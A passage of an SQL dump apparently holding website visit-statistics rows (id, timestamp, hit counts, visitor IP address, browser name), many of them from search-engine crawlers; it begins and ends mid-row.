1500027060,1,1,0,0,'217.69.133.6','other'),(132604,1500027754,4,4,0,0,'216.244.66.246','other'),(132605,1500028523,1,1,0,0,'46.174.163.134','chrome'),(132606,1500028524,1,1,0,0,'178.154.149.3','other'),(132607,1500028776,1,1,0,0,'141.8.132.43','other'),(132608,1500029198,1,1,0,0,'95.108.213.8','other'),(132609,1500029223,1,1,0,0,'217.182.132.175','other'),(132610,1500029780,1,1,0,0,'8.29.198.27','other'),(132611,1500029848,1,1,0,0,'5.255.253.43','other'),(132612,1500030401,1,1,0,0,'91.204.213.38','chrome'),(132613,1500030774,1,1,0,0,'51.255.71.113','other'),(132614,1500031022,1,1,0,0,'5.255.253.43','other'),(132615,1500031345,1,1,0,0,'137.74.207.120','other'),(132616,1500031648,1,1,0,0,'37.52.243.36','chrome'),(132617,1500031840,1,1,0,0,'5.255.253.63','other'),(132618,1500031843,1,0,1,0,'68.180.230.48',''),(132619,1500032010,1,1,0,0,'51.255.71.115','other'),(132620,1500032178,1,1,0,0,'178.92.84.107','chrome'),(132621,1500032303,2,0,2,0,'66.249.76.89',''),(132622,1500032359,1,1,0,0,'51.255.71.128','other'),(132623,1500033126,1,1,0,0,'95.108.179.15','other'),(132624,1500033300,1,1,0,0,'5.255.253.83','other'),(132625,1500033879,1,1,0,0,'51.255.65.35','other'),(132626,1500034175,1,1,0,0,'37.55.151.241','firefox'),(132627,1500034551,1,1,0,0,'217.182.132.69','other'),(132628,1500034612,1,1,0,0,'217.182.132.24','other'),(132629,1500034618,1,1,0,0,'66.249.76.91','chrome'),(132630,1500034827,1,1,0,0,'5.255.253.43','other'),(132631,1500034925,1,1,0,0,'137.74.207.110','other'),(132632,1500035200,3,3,0,0,'216.244.66.246','other'),(132633,1500035362,1,1,0,0,'46.200.127.109','firefox'),(132634,1500035378,1,1,0,0,'141.8.142.164','other'),(132635,1500035508,1,1,0,0,'109.192.228.149','firefox'),(132636,1500035526,1,1,0,0,'194.50.254.168','chrome'),(132637,1500035844,1,1,0,0,'51.255.65.81','other'),(132638,1500036099,1,1,0,0,'95.79.164.147','chrome'),(132639,1500036353,1,1,0,0,'217.182.132.25','other'),(132640,1500036435,1,1,0,0,'217.182.132.18','other'),(132641,1500036521,1,1,0,0,'51.255.71.112','other'),(132642,1500036677,1,1,0,0,'109.206.55.32','chrome'),(132643,1500036791,1,1,0,0,'93.158.152.77','other'),(132644,1500036965,1,1,0,0,'91.209.11.236','other'),(132645,1500037100,1,1,0,0,'217.182.132.58','other'),(132646,1500037285,1,1,0,0,'216.244.66.246','other'),(132647,1500037641,1,1,0,0,'217.182.132.183','other'),(132648,1500037884,1,1,0,0,'51.255.65.65','other'),(132649,1500037917,1,1,0,0,'91.196.178.71','chrome'),(132650,1500038153,1,1,0,0,'217.69.133.4','other'),(132651,1500038158,1,1,0,0,'217.69.133.9','other'),(132652,1500038271,1,1,0,0,'217.182.132.57','other'),(132653,1500038700,1,1,0,0,'216.244.66.194','other'),(132654,1500038713,1,1,0,0,'217.182.132.91','other'),(132655,1500039158,1,0,1,0,'66.249.76.109',''),(132656,1500039318,1,1,0,0,'217.69.133.203','other'),(132657,1500039319,1,1,0,0,'51.255.65.73','other'),(132658,1500039320,1,1,0,0,'217.69.133.3','other'),(132659,1500039333,1,0,1,0,'66.249.66.75',''),(132660,1500039930,1,1,0,0,'217.182.132.173','other'),(132661,1500040455,1,1,0,0,'217.182.132.56','other'),(132662,1500040604,1,1,0,0,'8.29.198.25','other'),(132663,1500040657,1,1,0,0,'217.69.133.9','other'),(132664,1500040931,1,1,0,0,'51.255.65.57','other'),(132665,1500041047,6,6,0,0,'216.244.66.194','other'),(132666,1500041137,1,1,0,0,'217.182.132.94','other'),(132667,1500041216,1,1,0,0,'51.255.65.83','other'),(132668,1500041481,1,1,0,0,'164.132.162.164','other'),(132669,1500041545,1,1,0,0,'91.224.96.187','chrome'),(132670,1500043099,1,1,0,0,'78.106.187.93','other'),(132671,1500043474,1,1,0,0,'217.182.132.79','other'),(132672,1500043594,1,1,0,0,'217.182.132.31','other'),(132673,1500043830,1,1,0,0,'66.249.76.91','chrome'),(132674,1500044479,1,1,0,0,'46.161.9.55','firefox'),(132675,1500045321,1,1,0,0,'51.255.65.24','other'),(132676,1500045496,1,1,0,0,'51.255.65.81','other'),(132677,1500045652,1,1,0,0,'216.244.66.246','other'),(132678,1500046401,1,1,0,0,'217.182.132.151','other'),(132679,1500046504,1,1,0,0,'83.149.126.98','other'),(132680,1500046770,1,1,0,0,'137.74.201.108','other'),(132681,1500046782,1,1,0,0,'51.255.71.122','other'),(132682,1500047080,1,1,0,0,'137.74.203.194','other'),(132683,1500047381,1,1,0,0,'217.182.132.28','other'),(132684,1500047566,1,0,1,0,'66.249.66.155',''),(132685,1500047708,1,1,0,0,'51.255.65.64','other'),(132686,1500047767,1,1,0,0,'164.132.162.159','other'),(132687,1500048766,1,1,0,0,'164.132.162.160','other'),(132688,1500049005,1,0,1,0,'68.180.230.48',''),(132689,1500049100,1,0,1,0,'66.249.76.108',''),(132690,1500049108,1,1,0,0,'176.193.115.15','msie'),(132691,1500049173,1,1,0,0,'5.255.253.63','other'),(132692,1500049195,2,2,0,0,'87.250.224.7','other'),(132693,1500049970,1,1,0,0,'216.244.66.246','other'),(132694,1500050109,1,1,0,0,'66.249.76.107','chrome'),(132695,1500050222,1,1,0,0,'66.249.76.91','chrome'),(132696,1500050430,2,2,0,0,'91.209.11.236','other'),(132697,1500050740,1,1,0,0,'51.255.65.76','other'),(132698,1500051449,1,1,0,0,'8.29.198.27','other'),(132699,1500051613,1,1,0,0,'51.255.65.89','other'),(132700,1500052081,1,1,0,0,'51.255.65.80','other'),(132701,1500052406,2,2,0,0,'95.108.213.34','other'),(132702,1500052623,1,1,0,0,'164.132.162.159','other'),(132703,1500052766,2,2,0,0,'5.255.253.63','other'),(132704,1500053024,2,2,0,0,'91.209.11.236','other'),(132705,1500053047,1,1,0,0,'217.182.132.76','other'),(132706,1500053167,1,1,0,0,'137.74.203.194','other'),(132707,1500053693,1,0,1,0,'66.249.76.108',''),(132708,1500053824,2,2,0,0,'66.249.76.93','chrome'),(132709,1500053886,1,1,0,0,'95.108.179.15','other'),(132710,1500053912,1,1,0,0,'95.108.213.34','other'),(132711,1500054609,1,1,0,0,'164.132.164.180','other'),(132712,1500054753,1,1,0,0,'66.249.66.76','chrome'),(132713,1500054827,1,1,0,0,'217.182.132.83','other'),(132714,1500054896,1,1,0,0,'217.69.133.194','other'),(132715,1500054944,1,1,0,0,'91.209.11.236','other'),(132716,1500055468,2,2,0,0,'66.249.76.89','chrome'),(132717,1500055469,1,1,0,0,'141.8.142.164','other'),(132718,1500055496,1,1,0,0,'51.255.65.53','other'),(132719,1500055969,1,1,0,0,'217.69.133.203','other'),(132720,1500056001,1,0,1,0,'66.249.66.157',''),(132721,1500056267,1,1,0,0,'180.76.15.137','other'),(132722,1500057698,1,1,0,0,'141.8.142.164','other'),(132723,1500057856,1,1,0,0,'217.182.132.155','other'),(132724,1500057869,1,1,0,0,'217.182.132.192','other'),(132725,1500057926,1,1,0,0,'216.244.66.194','other'),(132726,1500057940,4,4,0,0,'216.244.66.246','other'),(132727,1500058019,1,1,0,0,'51.255.71.119','other'),(132728,1500058385,1,0,1,0,'66.249.76.109',''),(132729,1500058553,1,0,1,0,'68.180.230.48',''),(132730,1500059337,1,1,0,0,'91.196.178.165','chrome'),(132731,1500059856,1,1,0,0,'216.244.66.246','other'),(132732,1500060062,1,1,0,0,'217.182.132.95','other'),(132733,1500060488,1,0,1,0,'66.249.76.93',''),(132734,1500060511,1,1,0,0,'217.69.133.4','other'),(132735,1500060539,2,2,0,0,'91.209.11.236','other'),(132736,1500060688,1,1,0,0,'51.255.65.57','other'),(132737,1500061238,1,1,0,0,'217.182.132.34','other'),(132738,1500061554,1,1,0,0,'217.182.132.187','other'),(132739,1500062207,1,1,0,0,'151.80.27.116','other'),(132740,1500062280,1,1,0,0,'8.29.198.26','other'),(132741,1500062366,1,0,1,0,'66.249.76.107',''),(132742,1500062590,1,1,0,0,'51.255.65.76','other'),(132743,1500062621,2,2,0,0,'141.8.142.164','other'),(132744,1500062872,1,1,0,0,'217.182.132.240','other'),(132745,1500063044,1,1,0,0,'51.255.65.45','other'),(132746,1500063137,1,1,0,0,'216.244.66.237','other'),(132747,1500063230,1,0,1,0,'66.249.76.91',''),(132748,1500063532,1,1,0,0,'141.8.142.154','other'),(132749,1500063535,1,1,0,0,'216.244.66.194','other'),(132750,1500064541,1,1,0,0,'51.255.65.8','other'),(132751,1500064992,1,1,0,0,'95.108.213.34','other'),(132752,1500065362,1,1,0,0,'141.8.142.154','other'),(132753,1500065423,1,1,0,0,'51.255.65.44','other'),(132754,1500065525,1,1,0,0,'51.255.71.132','other'),(132755,1500065690,1,1,0,0,'51.255.65.61','other'),(132756,1500065886,1,1,0,0,'51.255.65.3','other'),(132757,1500066860,1,0,1,0,'66.249.76.91',''),(132758,1500066925,1,1,0,0,'66.249.76.66','chrome'),(132759,1500066931,1,1,0,0,'66.249.76.107','chrome'),(132760,1500066951,1,1,0,0,'87.250.224.7','other'),(132761,1500067205,1,1,0,0,'91.209.11.236','other'),(132762,1500067271,1,0,1,0,'68.180.230.48',''),(132763,1500067450,1,1,0,0,'51.255.65.67','other'),(132764,1500067881,1,1,0,0,'51.255.65.57','other'),(132765,1500068089,1,1,0,0,'139.59.152.186','other'),(132766,1500068356,1,1,0,0,'217.182.132.50','other'),(132767,1500068459,1,1,0,0,'217.182.132.155','other'),(132768,1500069777,2,2,0,0,'51.255.65.58','other'),(132769,1500069800,1,1,0,0,'87.250.224.7','other'),(132770,1500070279,2,2,0,0,'91.209.11.236','other'),(132771,1500070419,1,1,0,0,'217.182.132.50','other'),(132772,1500070532,1,0,1,0,'66.249.76.108',''),(132773,1500070555,1,1,0,0,'51.255.65.11','other'),(132774,1500070869,4,4,0,0,'216.244.66.246','other'),(132775,1500071232,1,1,0,0,'51.255.65.34','other'),(132776,1500071290,1,1,0,0,'51.255.65.69','other'),(132777,1500071604,1,1,0,0,'217.182.132.69','other'),(132778,1500071652,1,1,0,0,'217.69.133.2','other'),(132779,1500072256,1,1,0,0,'95.108.213.34','other'),(132780,1500072405,1,1,0,0,'91.209.11.236','other'),(132781,1500072956,1,1,0,0,'164.132.162.160','other'),(132782,1500073107,1,1,0,0,'8.29.198.27','other'),(132783,1500073236,1,1,0,0,'66.249.66.74','chrome'),(132784,1500073413,2,2,0,0,'216.244.66.194','other'),(132785,1500073440,1,1,0,0,'217.182.132.24','other'),(132786,1500073629,1,1,0,0,'217.182.132.60','other'),(132787,1500074003,1,1,0,0,'217.69.133.2','other'),(132788,1500074352,1,1,0,0,'216.244.66.237','other'),(132789,1500074484,1,1,0,0,'95.108.179.15','other'),(132790,1500074830,1,1,0,0,'51.255.65.14','other'),(132791,1500075279,3,3,0,0,'88.234.200.156','other'),(132792,1500075570,1,1,0,0,'51.255.65.77','other'),(132793,1500076029,2,2,0,0,'216.244.66.246','other'),(132794,1500076249,1,1,0,0,'91.209.11.236','other'),(132795,1500077213,1,1,0,0,'217.69.133.2','other'),(132796,1500077558,2,2,0,0,'46.2.99.189','other'),(132798,1500077709,1,1,0,0,'87.250.224.7','other'),(132799,1500078148,1,1,0,0,'217.69.133.9','other'),(132800,1500078500,1,1,0,0,'51.255.65.48','other'),(132801,1500078670,1,1,0,0,'217.182.132.65','other'),(132802,1500078674,6,6,0,0,'46.2.99.189','other'),(132803,1500078762,3,3,0,0,'5.255.253.63','other'),(132804,1500078795,1,1,0,0,'207.46.13.71','other'),(132805,1500078814,1,1,0,0,'66.249.66.157','chrome'),(132806,1500078884,1,1,0,0,'141.8.142.164','other'),(132807,1500079202,3,3,0,0,'213.136.73.115','other'),(132808,1500079381,1,1,0,0,'51.255.71.98','other'),(132809,1500079531,1,1,0,0,'217.69.133.4','other'),(132810,1500080008,1,1,0,0,'217.182.132.157','other'),(132811,1500080068,4,4,0,0,'216.244.66.194','other'),(132812,1500080325,1,1,0,0,'137.74.201.100','other'),(132813,1500081011,1,1,0,0,'87.250.224.7','other'),(132814,1500081204,1,1,0,0,'217.182.132.6','other'),(132815,1500081291,2,2,0,0,'216.244.66.246','other'),(132816,1500081295,1,1,0,0,'95.108.213.34','other'),(132817,1500081370,1,1,0,0,'217.182.132.64','other'),(132818,1500081412,1,0,1,0,'66.249.76.108',''),(132819,1500082485,2,2,0,0,'91.209.11.236','other'),(132820,1500082786,1,1,0,0,'217.69.133.203','other'),(132821,1500083221,2,2,0,0,'216.244.66.246','other'),(132822,1500083483,1,1,0,0,'207.46.13.74','other'),(132823,1500083661,1,1,0,0,'217.69.133.2','other'),(132824,1500083671,1,1,0,0,'66.249.76.91','chrome'),(132825,1500083754,1,1,0,0,'91.209.11.236','other'),(132826,1500083804,1,1,0,0,'217.182.132.153','other'),(132827,1500083907,1,1,0,0,'137.74.207.159','other'),(132828,1500083936,1,1,0,0,'8.29.198.26','other'),(132829,1500084337,1,1,0,0,'217.182.132.94','other'),(132830,1500084459,1,1,0,0,'217.182.132.241','other'),(132831,1500084813,1,1,0,0,'95.108.179.15','other'),(132832,1500084970,1,1,0,0,'207.46.13.71','other'),(132833,1500085085,1,1,0,0,'51.255.65.49','other'),(132834,1500085140,1,1,0,0,'217.182.132.74','other'),(132835,1500085223,2,2,0,0,'91.209.11.236','other'),(132836,1500085349,1,1,0,0,'87.250.224.7','other'),(132837,1500086706,1,1,0,0,'180.76.15.137','other'),(132838,1500086983,1,0,1,0,'66.249.76.108',''),(132839,1500087024,1,1,0,0,'217.182.132.72','other'),(132840,1500087107,1,1,0,0,'207.46.13.71','other'),(132841,1500087188,1,1,0,0,'66.249.76.107','chrome'),(132842,1500087296,1,1,0,0,'91.209.11.236','other'),(132843,1500087307,4,4,0,0,'216.244.66.194','other'),(132844,1500087726,1,1,0,0,'217.182.132.50','other'),(132845,1500088023,1,1,0,0,'137.74.207.159','other'),(132846,1500088246,1,1,0,0,'217.182.132.91','other'),(132847,1500088305,1,1,0,0,'217.69.133.4','other'),(132848,1500089212,1,1,0,0,'217.69.133.3','other'),(132849,1500089449,1,1,0,0,'217.182.132.25','other'),(132850,1500089566,1,1,0,0,'137.74.207.109','other'),(132851,1500089647,1,1,0,0,'95.108.213.34','other'),(132852,1500089742,1,1,0,0,'51.255.71.114','other'),(132853,1500090129,1,1,0,0,'207.46.13.100','other'),(132854,1500090372,1,1,0,0,'141.8.142.164','other'),(132855,1500091213,2,1,1,0,'66.249.76.107',''),(132856,1500091224,1,0,1,0,'66.249.66.156',''),(132857,1500091292,1,1,0,0,'51.255.65.92','other'),(132858,1500091333,1,1,0,0,'217.182.132.37','other'),(132859,1500091385,1,1,0,0,'216.244.66.246','other'),(132860,1500091928,1,1,0,0,'51.255.65.84','other'),(132861,1500092352,1,1,0,0,'95.108.213.34','other'),(132862,1500092674,1,0,1,0,'66.249.66.75',''),(132863,1500092822,1,1,0,0,'51.255.65.67','other'),(132864,1500093059,1,1,0,0,'51.255.65.10','other'),(132865,1500093325,1,1,0,0,'51.255.65.51','other'),(132866,1500093379,2,2,0,0,'216.244.66.246','other'),(132867,1500093861,1,1,0,0,'217.69.133.2','other'),(132868,1500093989,1,1,0,0,'66.249.66.74','chrome'),(132869,1500094175,1,1,0,0,'95.108.213.34','other'),(132870,1500094435,1,1,0,0,'217.182.132.151','other'),(132871,1500094517,1,1,0,0,'217.182.132.174','other'),(132872,1500094675,1,0,1,0,'66.249.66.157',''),(132873,1500094770,1,1,0,0,'8.29.198.25','other'),(132874,1500094928,1,1,0,0,'91.196.178.34','chrome'),(132875,1500095115,1,1,0,0,'51.255.71.132','other'),(132876,1500095376,1,1,0,0,'141.8.142.154','other'),(132877,1500095585,1,1,0,0,'91.209.11.236','other'),(132878,1500095738,1,1,0,0,'95.108.213.34','other'),(132879,1500095873,1,1,0,0,'217.182.132.78','other'),(132880,1500095884,1,0,1,0,'66.249.76.93',''),(132881,1500096115,1,1,0,0,'216.244.66.194','other'),(132882,1500096190,1,1,0,0,'66.249.76.91','chrome'),(132883,1500097402,1,1,0,0,'141.8.142.164','other'),(132884,1500097745,1,1,0,0,'51.255.65.36','other'),(132885,1500097957,1,1,0,0,'51.255.65.68','other'),(132886,1500098472,1,1,0,0,'217.182.132.90','other'),(132887,1500098683,1,1,0,0,'87.250.224.7','other'),(132888,1500099077,1,0,1,0,'66.249.66.157',''),(132889,1500099205,1,1,0,0,'141.8.142.164','other'),(132890,1500099432,1,1,0,0,'217.69.133.9','other'),(132891,1500100042,1,1,0,0,'87.250.224.7','other'),(132892,1500100887,1,1,0,0,'51.255.65.85','other'),(132893,1500101384,1,1,0,0,'217.182.132.83','other'),(132894,1500102332,1,1,0,0,'66.102.9.29','chrome'),(132895,1500102725,1,1,0,0,'66.249.66.157','chrome'),(132896,1500102870,1,1,0,0,'180.76.15.18','other'),(132897,1500103769,1,1,0,0,'51.255.71.127','other'),(132898,1500103864,1,1,0,0,'141.8.142.164','other'),(132899,1500104253,1,1,0,0,'217.182.132.60','other'),(132900,1500104458,2,2,0,0,'216.244.66.246','other'),(132901,1500104697,1,1,0,0,'217.182.132.37','other'),(132902,1500104854,1,1,0,0,'91.209.11.236','other'),(132903,1500105597,1,1,0,0,'8.29.198.26','other'),(132904,1500105629,1,1,0,0,'176.213.233.160','chrome'),(132905,1500105741,1,1,0,0,'87.250.224.7','other'),(132906,1500105874,1,1,0,0,'217.69.133.194','other'),(132907,1500106033,1,0,1,0,'66.249.76.107',''),(132908,1500106112,1,1,0,0,'66.249.76.108','chrome'),(132909,1500106649,1,1,0,0,'217.182.132.66','other'),(132910,1500106914,1,1,0,0,'93.158.152.77','other'),(132911,1500106958,1,1,0,0,'95.108.213.34','other'),(132912,1500107502,1,1,0,0,'51.255.65.25','other'),(132913,1500107658,1,1,0,0,'207.46.13.71','other'),(132914,1500107685,1,0,1,0,'66.249.66.155',''),(132915,1500108040,1,1,0,0,'51.255.71.114','other'),(132916,1500108184,1,1,0,0,'157.55.39.97','other'),(132917,1500108230,1,1,0,0,'87.250.224.7','other'),(132918,1500108265,1,1,0,0,'91.209.11.236','other'),(132919,1500108293,1,1,0,0,'141.8.142.154','other'),(132920,1500108483,1,1,0,0,'207.46.13.100','other'),(132921,1500108529,1,1,0,0,'216.244.66.246','other'),(132922,1500108778,1,1,0,0,'51.255.65.82','other'),(132923,1500108784,1,1,0,0,'207.46.13.71','other'),(132924,1500108882,1,1,0,0,'141.8.142.164','other'),(132925,1500109051,1,1,0,0,'95.108.213.34','other'),(132926,1500109126,1,1,0,0,'217.182.132.25','other'),(132927,1500110298,1,1,0,0,'95.108.213.34','other'),(132928,1500110541,7,7,0,0,'46.229.168.76','other'),(132929,1500110559,4,4,0,0,'46.229.168.80','other'),(132930,1500110585,5,5,0,0,'46.229.168.78','other'),(132931,1500110596,6,6,0,0,'46.229.168.72','other'),(132932,1500110613,5,5,0,0,'46.229.168.70','other'),(132933,1500110655,4,4,0,0,'46.229.168.77','other'),(132934,1500110714,2,2,0,0,'46.229.168.66','other'),(132935,1500110739,4,4,0,0,'46.229.168.69','other'),(132936,1500110757,3,3,0,0,'46.229.168.79','other'),(132937,1500110812,4,4,0,0,'46.229.168.65','other'),(132938,1500110848,3,3,0,0,'46.229.168.68','other'),(132939,1500110884,5,5,0,0,'46.229.168.71','other'),(132940,1500110937,1,1,0,0,'217.182.132.146','other'),(132941,1500111100,3,3,0,0,'46.229.168.73','other'),(132942,1500111154,11,11,0,0,'46.229.168.75','other'),(132943,1500111226,5,5,0,0,'46.229.168.67','other'),(132944,1500111339,1,1,0,0,'66.249.76.107','chrome'),(132945,1500111515,6,6,0,0,'46.229.168.72','other'),(132946,1500111517,2,2,0,0,'46.229.168.78','other'),(132947,1500111533,1,1,0,0,'46.229.168.76','other'),(132948,1500111617,1,1,0,0,'46.229.168.77','other'),(132949,1500111714,5,5,0,0,'46.229.168.70','other'),(132950,1500111734,10,10,0,0,'46.229.168.80','other'),(132951,1500111795,8,8,0,0,'46.229.168.71','other'),(132952,1500111807,1,1,0,0,'91.209.11.236','other'),(132953,1500111821,6,6,0,0,'46.229.168.65','other'),(132954,1500111853,1,1,0,0,'5.255.253.63','other'),(132955,1500111861,4,4,0,0,'46.229.168.68','other'),(132956,1500111965,8,8,0,0,'46.229.168.69','other'),(132957,1500111970,10,10,0,0,'46.229.168.79','other'),(132958,1500112074,5,5,0,0,'46.229.168.75','other'),(132959,1500112118,1,1,0,0,'46.229.168.66','other'),(132960,1500112189,4,4,0,0,'46.229.168.73','other'),(132961,1500112242,1,1,0,0,'95.108.179.15','other'),(132962,1500112309,3,3,0,0,'46.229.168.67','other'),(132963,1500112342,2,2,0,0,'46.229.168.74','other'),(132964,1500112452,1,1,0,0,'46.229.168.78','other'),(132965,1500112485,3,3,0,0,'46.229.168.76','other'),(132966,1500112901,1,1,0,0,'141.8.142.164','other'),(132967,1500113073,1,1,0,0,'217.69.133.203','other'),(132968,1500113077,1,1,0,0,'217.69.133.4','other'),(132969,1500113173,1,1,0,0,'217.182.132.187','other'),(132970,1500113933,1,1,0,0,'51.255.65.21','other'),(132971,1500114010,1,1,0,0,'137.74.207.114','other'),(132972,1500114395,1,1,0,0,'51.255.65.92','other'),(132973,1500114613,1,1,0,0,'207.46.13.74','other'),(132974,1500115457,1,1,0,0,'217.182.132.18','other'),(132975,1500115460,2,2,0,0,'216.244.66.246','other'),(132976,1500115560,1,1,0,0,'87.250.224.7','other'),(132977,1500116437,1,1,0,0,'8.29.198.26','other'),(132978,1500116500,1,1,0,0,'141.8.142.154','other'),(132979,1500116660,1,0,1,0,'66.249.76.108',''),(132980,1500116789,1,1,0,0,'51.255.71.112','other'),(132981,1500117028,1,1,0,0,'91.209.11.236','other'),(132982,1500117043,1,1,0,0,'95.108.179.15','other'),(132983,1500117085,1,0,1,0,'68.180.230.48',''),(132984,1500117602,1,1,0,0,'217.182.132.186','other'),(132985,1500117681,1,1,0,0,'51.255.65.73','other'),(132986,1500117803,2,2,0,0,'95.108.213.34','other'),(132987,1500118078,1,1,0,0,'51.255.65.4','other'),(132988,1500118201,1,1,0,0,'51.255.65.85','other'),(132989,1500119344,1,1,0,0,'217.182.132.171','other'),(132990,1500119990,1,1,0,0,'216.244.66.194','other'),(132991,1500120717,1,1,0,0,'95.108.179.15','other'),(132992,1500120971,1,1,0,0,'91.209.11.236','other'),(132993,1500121090,1,1,0,0,'217.182.132.151','other'),(132994,1500121117,1,1,0,0,'217.182.132.67','other'),(132995,1500121345,1,1,0,0,'137.74.207.120','other'),(132996,1500122038,1,1,0,0,'51.255.65.48','other'),(132997,1500122420,1,1,0,0,'141.8.142.38','other'),(132998,1500122423,1,1,0,0,'95.108.179.8','other'),(132999,1500122753,1,1,0,0,'51.255.65.74','other'),(133000,1500122825,1,1,0,0,'217.69.133.2','other'),(133001,1500124583,1,0,1,0,'68.180.230.48',''),(133002,1500124664,1,1,0,0,'141.8.142.154','other'),(133003,1500124691,1,1,0,0,'217.182.132.75','other'),(133004,1500124765,1,1,0,0,'51.255.65.93','other'),(133005,1500124794,1,1,0,0,'216.244.66.246','other'),(133006,1500124993,1,1,0,0,'46.161.9.55','chrome'),(133007,1500125058,1,1,0,0,'87.250.224.18','other'),(133008,1500125329,7,7,0,0,'216.244.66.194','other'),(133009,1500125638,1,1,0,0,'95.108.213.34','other'),(133010,1500125805,1,1,0,0,'141.8.142.154','other'),(133011,1500125887,1,1,0,0,'66.249.76.93','chrome'),(133012,1500126115,1,1,0,0,'51.255.71.115','other'),(133013,1500126128,1,1,0,0,'217.182.132.17','other'),(133014,1500126134,1,1,0,0,'87.250.224.18','other'),(133015,1500126710,1,1,0,0,'95.108.179.15','other'),(133016,1500126720,1,1,0,0,'51.255.65.13','other'),(133017,1500126847,1,1,0,0,'217.182.132.7','other'),(133018,1500126999,1,1,0,0,'91.209.11.236','other'),(133019,1500127176,1,1,0,0,'51.255.71.111','other'),(133020,1500127276,1,1,0,0,'8.29.198.26','other'),(133021,1500127839,1,1,0,0,'176.213.233.160','chrome'),(133022,1500128232,1,1,0,0,'217.182.132.94','other'),(133023,1500128255,1,0,1,0,'66.249.76.109',''),(133024,1500128323,1,0,1,0,'68.180.230.48',''),(133025,1500128607,1,1,0,0,'137.74.207.116','other'),(133026,1500128808,1,1,0,0,'137.74.207.161','other'),(133027,1500128845,1,1,0,0,'51.255.71.122','other'),(133028,1500129202,1,0,1,0,'66.249.76.107',''),(133029,1500129245,1,1,0,0,'217.182.132.150','other'),(133030,1500130227,1,1,0,0,'51.255.65.36','other'),(133031,1500130249,2,2,0,0,'91.209.11.236','other'),(133032,1500130494,1,1,0,0,'91.196.178.37','chrome'),(133033,1500130705,1,1,0,0,'217.182.132.35','other'),(133034,1500130900,1,1,0,0,'217.182.132.146','other'),(133035,1500131248,2,2,0,0,'216.244.66.194','other'),(133036,1500131972,1,1,0,0,'216.244.66.246','other'),(133037,1500132012,1,1,0,0,'137.74.207.114','other'),(133038,1500133106,1,1,0,0,'51.255.65.95','other'),(133039,1500133412,1,1,0,0,'95.108.213.34','other'),(133040,1500133538,1,1,0,0,'64.246.165.200','firefox'),(133041,1500133548,1,1,0,0,'217.182.132.180','other'),(133042,1500133562,1,1,0,0,'51.255.65.91','other'),(133043,1500133797,1,1,0,0,'180.76.15.137','other'),(133044,1500134235,1,1,0,0,'51.255.65.65','other'),(133045,1500135005,1,1,0,0,'217.182.132.69','other'),(133046,1500135010,1,1,0,0,'216.244.66.194','other'),(133047,1500135134,1,1,0,0,'157.55.39.179','other'),(133048,1500135451,1,1,0,0,'216.244.66.246','other'),(133049,1500135762,1,1,0,0,'217.69.133.4','other'),(133050,1500135775,1,1,0,0,'217.69.133.6','other'),(133051,1500135877,1,1,0,0,'51.255.65.8','other'),(133052,1500136605,1,1,0,0,'51.255.65.33','other'),(133053,1500136925,1,1,0,0,'217.182.132.27','other'),(133054,1500137020,1,1,0,0,'130.180.216.149','firefox'),(133055,1500137829,1,1,0,0,'95.108.213.34','other'),(133056,1500137851,1,1,0,0,'217.182.132.178','other'),(133057,1500137999,1,1,0,0,'141.8.142.164','other'),(133058,1500138078,1,1,0,0,'137.74.207.102','other'),(133059,1500138107,1,1,0,0,'8.29.198.25','other'),(133060,1500138130,1,1,0,0,'5.255.253.63','other'),(133061,1500138575,1,1,0,0,'51.255.71.101','other'),(133062,1500138753,1,1,0,0,'95.108.179.15','other'),(133063,1500139060,1,1,0,0,'216.244.66.246','other'),(133064,1500139194,1,1,0,0,'217.182.132.152','other'),(133065,1500139519,1,1,0,0,'217.182.132.54','other'),(133066,1500139619,1,1,0,0,'51.255.65.7','other'),(133067,1500139698,1,1,0,0,'87.250.224.18','other'),(133068,1500139719,1,1,0,0,'51.255.65.6','other'),(133069,1500139908,1,1,0,0,'51.255.65.74','other'),(133070,1500140190,1,1,0,0,'51.255.65.44','other'),(133071,1500140754,1,1,0,0,'178.154.200.60','other'),(133072,1500141194,1,1,0,0,'51.255.65.42','other'),(133073,1500141316,1,1,0,0,'141.8.142.91','other'),(133074,1500141626,1,1,0,0,'95.108.179.21','other'),(133075,1500141629,1,1,0,0,'51.255.65.89','other'),(133076,1500141724,1,1,0,0,'51.255.65.56','other'),(133077,1500142022,1,1,0,0,'93.158.152.60','other'),(133078,1500142334,1,1,0,0,'94.178.110.213','firefox'),(133079,1500142364,1,1,0,0,'95.221.61.145','msie'),(133080,1500143007,1,1,0,0,'180.76.15.6','other'),(133081,1500143102,1,1,0,0,'217.182.132.96','other'),(133082,1500143230,1,1,0,0,'217.182.132.4','other'),(133083,1500143568,1,1,0,0,'93.158.152.77','other'),(133084,1500143683,1,1,0,0,'217.182.132.149','other'),(133085,1500144092,1,1,0,0,'95.108.213.8','other'),(133086,1500144107,1,1,0,0,'91.196.178.164','chrome'),(133087,1500144234,1,1,0,0,'95.108.213.34','other'),(133088,1500144303,1,1,0,0,'178.154.200.37','other'),(133089,1500144324,1,1,0,0,'31.184.236.104','chrome'),(133090,1500144679,3,3,0,0,'216.244.66.194','other'),(133091,1500144691,1,1,0,0,'216.244.66.246','other'),(133092,1500144890,1,1,0,0,'91.196.178.167','chrome'),(133093,1500145039,1,1,0,0,'37.73.240.33','chrome'),(133094,1500145573,1,1,0,0,'217.69.133.9','other'),(133095,1500146006,1,1,0,0,'87.250.224.7','other'),(133096,1500146943,1,1,0,0,'207.46.13.71','other'),(133097,1500147006,1,1,0,0,'180.76.15.17','other'),(133098,1500147095,1,1,0,0,'51.255.65.46','other'),(133099,1500147128,1,1,0,0,'141.8.142.164','other'),(133100,1500147403,1,1,0,0,'95.108.213.34','other'),(133101,1500147714,1,1,0,0,'141.8.142.154','other'),(133102,1500148026,1,1,0,0,'217.182.132.78','other'),(133103,1500148177,1,1,0,0,'95.108.179.15','other'),(133104,1500148571,1,1,0,0,'91.209.11.236','other'),(133105,1500148947,1,1,0,0,'8.29.198.27','other'),(133106,1500148970,1,1,0,0,'46.161.9.55','firefox'),(133107,1500149131,2,2,0,0,'141.8.142.164','other'),(133108,1500149683,1,1,0,0,'217.182.132.61','other'),(133109,1500149847,1,1,0,0,'95.108.213.34','other'),(133110,1500150295,1,1,0,0,'51.255.65.69','other'),(133111,1500150360,1,1,0,0,'95.108.213.7','other'),(133112,1500150581,1,1,0,0,'217.182.132.16','other'),(133113,1500150619,3,3,0,0,'216.244.66.246','other'),(133114,1500150629,2,2,0,0,'95.108.179.15','other'),(133115,1500150987,1,1,0,0,'51.255.65.64','other'),(133116,1500150988,1,1,0,0,'51.255.71.115','other'),(133117,1500151128,1,1,0,0,'163.172.101.245','firefox'),(133118,1500151460,1,0,1,0,'66.249.76.109',''),(133119,15